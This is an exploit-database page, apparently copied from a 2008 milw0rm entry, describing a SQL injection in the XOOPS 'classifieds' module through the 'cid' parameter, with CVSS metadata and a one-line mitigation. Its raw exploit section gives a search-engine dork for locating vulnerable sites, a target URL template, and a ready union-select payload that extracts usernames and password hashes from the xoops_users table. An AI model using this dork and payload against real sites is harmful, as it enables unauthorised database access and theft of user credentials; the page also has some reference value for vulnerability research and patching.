header-logo
Suggest Exploit
vendor:
Module classifieds
by:
S@BUN
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Module classifieds
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

XOOPS Module classifieds SQL Injection(cid)

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'cid' parameter to '/modules/classifieds/index.php' script. A remote attacker can execute arbitrary SQL commands in application's database and gain access to sensitive information. Successful exploitation requires that 'register_globals' is set to 'On'.

Mitigation:

Disable 'register_globals' setting in php.ini configuration file.
Source

Exploit-DB raw data:

###############################################################
#
# XOOPS Module classifieds SQL Injection(cid)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl: cid"modules/classifieds/index.php?pa=Adsview"
#
################################################################
example

http://xxxx/modules/classifieds/index.php?pa=Adsview&cid=[exploit]

EXPLOIT :

-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0x3a,0x3a,concat(uname,0x3a,pass)/**/from+xoops_users/*where%20admin%20-1

################################################################
# S@BUN                i AM NOT HACKER           S@BUN
################################################################

# milw0rm.com [2008-02-19]